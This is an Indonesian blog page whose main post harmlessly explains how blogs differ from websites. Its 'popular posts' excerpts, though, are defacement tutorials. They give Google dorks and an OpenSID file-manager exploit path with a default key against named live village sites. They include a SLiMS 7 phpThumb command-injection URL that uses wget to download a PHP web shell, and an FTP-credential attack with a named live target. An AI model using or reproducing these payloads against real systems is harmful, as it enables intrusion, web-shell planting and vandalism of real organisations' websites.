Langsung ke konten utama

Bedanya Blog Dan Website



Apa Sih Bedanya Blog Dan Website??

Blog umumnya disusun secara kronologis  Website tidak selalu
Blog umumnya tersusun secara kronologis. Artikel atau posting terbaru akan muncul di halaman utama paling atas. Sedankan artikel yang lawas akandiletakan dibawahnya. Sedangkan website umumnya mempunyai menu menu yang membagi bagi artikel berdasarkan kategori ataupun berdasarkan Menu yang tersusun dari awal.

Blog berisi pendapat pribadi sedangkan Website berisi berita atau fakta
Blog umumnya berisi pendapat pribadi penulisnya tentang hal yang ia sukai, baik itu komputer, politik, dan bidang lain yang menurut dia menarik. sedangkan website umumnya berisi artikel berita dan fakta serta data. Saat ini, perbedaan diatas mulai pudar karena sekarang juga banyak Blog yang diubah menjadi website secara instant dan blog bisa berisi artikel apa saja.

Blog umumnya diperuntukan untuk penulis yang awam tentang pembuatan publikasi internet

Di era sebelum blog, tidak banyak orang yang tau bagaimana mempublikasikan tulisan di internet karena selain untuk biaya hosting yang mahal, penulis juga harus  tau tenttang HTML, CSS dan berbagai macam teknologi web lainnya. Blog (bersama CMS) adalah solusi praktis bagi para penulis yang tidak ingin direpotkan dengan hal hal teknis seputar teknologi IT, sehingga sekarang siapa saja bisa mempunyai blog.  Website umumnya dibuat dari awal oleh suatu organisasi atau perusahaan.

Blog dibangun dengan Sistem ‘Instan’
sedangkan web Tidak Blog umumnya dibuat menggunakan layanan pihak ketiga seperti wordpress ataupun blogger sedangkan webiste umumnya dibuat oleh seorang web designer dan programer web walaupun juga ada website yang dibuat dengan instant menggunakan CMS (Content management sistem).

Tampilan (layout)  Blog umumnya  sama atau sejenis

Karena Blog dibangun diatas sistem pihak ketiga maka umumnya layout, thema dan tampilan dari blog seragarm, mirip atau sejenis. Hal hal yang umum diblog seperti komentar, arsip, recent post dan sejenisnya umumnya mirip walaupun blog memakai sistem yang berbeda.

BLog tidak bisa ditambahkan aplikasi web untuk keperluan khusus

Misalkan anda ingin membuat sistem untuk penjualan barang online.  anda tidak bisa mengandalkan blog, anda harus membuat website sendiri atau meminta kepada pihak ketiga. Hal ini dikarenakan fungsi awal blog memang hanya untuk menulis ‘catatan harian’ online. Disinilah salah satu perbedaan mencolok antara blog dan website.

Umumnya Website juga mempunyai subdomain berupa blog tapi tidak sebaliknya

sebagai contoh, Facebook dan twitter adalah website yang menawarkan berbagai macam kemudahan untuk para penggunaanya. Kedua website ini ternyata juga mempunyai blog untuk mengabarkan kepada pengguna tentang perubahan dari website, baik kebijakan ataupun fitur baru. Disini bisa ditarik kesimpulan Bahwa umumnya  Suatu website juga bisa ditambahkan blog didalamnya namun tidak sebaliknya.


Postingan populer dari blog ini

Deface Poc RFM OpenSID

Dork: "OpenSID Tangerang"            "OpenSID Bandung"            "Desa SID site:"           Exploit: /assets/filemanager/dialog.php?akey=GantiKunciDesa Dorking Dulu Lah Kalianya Nih Live Target : http://kalidengen-kulonprogo.desa.id http://pantaigading.opendesa.id/ Tambahkan Exploitnya..... Terus ntar ada tuh Rfm atau Responsif FileManager Kalian Upload Mini Shell / Uploader Kalian Kalau bisa Rename Jadi format.txt misalnya (shell.php<?.txt) nah itu ntar itu pasti langsung berubah jadi format php...txtnya dah keinject ama <? Nih Comot Mini Uploader Buat Up Shell //Powered By Mr.Colded X Mr.Cold// //Team : 3RROR YOUR SYSTEM // <title>./CryMera - FR13NDS CYBER ARMY </title><center> <body bgcolor= "black" >     <br><br><br><br>     <br>     <font color= "lime" size= "5" >> ./CryMera <</font> <font color= "r

Slims Command Injection

 Slims 7 PhpThumb Command Injection Dork : Powered By SLIMS 7 (Cendana)  inurl:/index.php?p=show_detail&id= "Detail Cantuman" site:ac.id "Powered By Slims7" site:ac.id ~~~~ Check Vuln (command injected) : /lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;ls -la;%20&phpThumbDebug=9 Upload shell : /lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/mini.php;%20&phpThumbDebug=9 File access : /lib/watermark/shell.php References : https://www.bandung6etar.my.id/2020/09/deface-cms-slims-command-injection.html

Deface poc Ftp Server Attack

Assalamualaikum wr.wb Bagaimana kabar saudara sekalian?? Baik pasti nya yaa Oke di tutorial deface ini saya mau membagikan poc ftp server attack Yang dimana si hacker mengakses data data penting di ftp web tersebut Ada beberapa teknik si hacker mendapatkan akses ke ftp web, Salah satu nya di brute force yaitu mencari password default dari domain web nya Oke dah langsung aja ke tutorialnya Gosah banyak cingcong gosah banyak bacot kalo kata lider kami si padang :v Bahan-bahan : - Dork > intitle:"index of" sftp-config.json            > intitle:"index of" ftpsync.settings - Apk ftp - Shell backdoor, kalo lu gakda shell cek aja di blog ini,, minishell backdoor ~ power f ~ akun pebeh  Gass bewan awp di burning hall :v Oke gesss +Pertama kita buka Apeka ep te pe nya terlebih dahulu eaaa, Live target gue => http://vakantievillacalpedylano.be +Yang kedua kalian pastikan ada akun ftp di web target, +Ketiga kalian masukan host,port,user passwor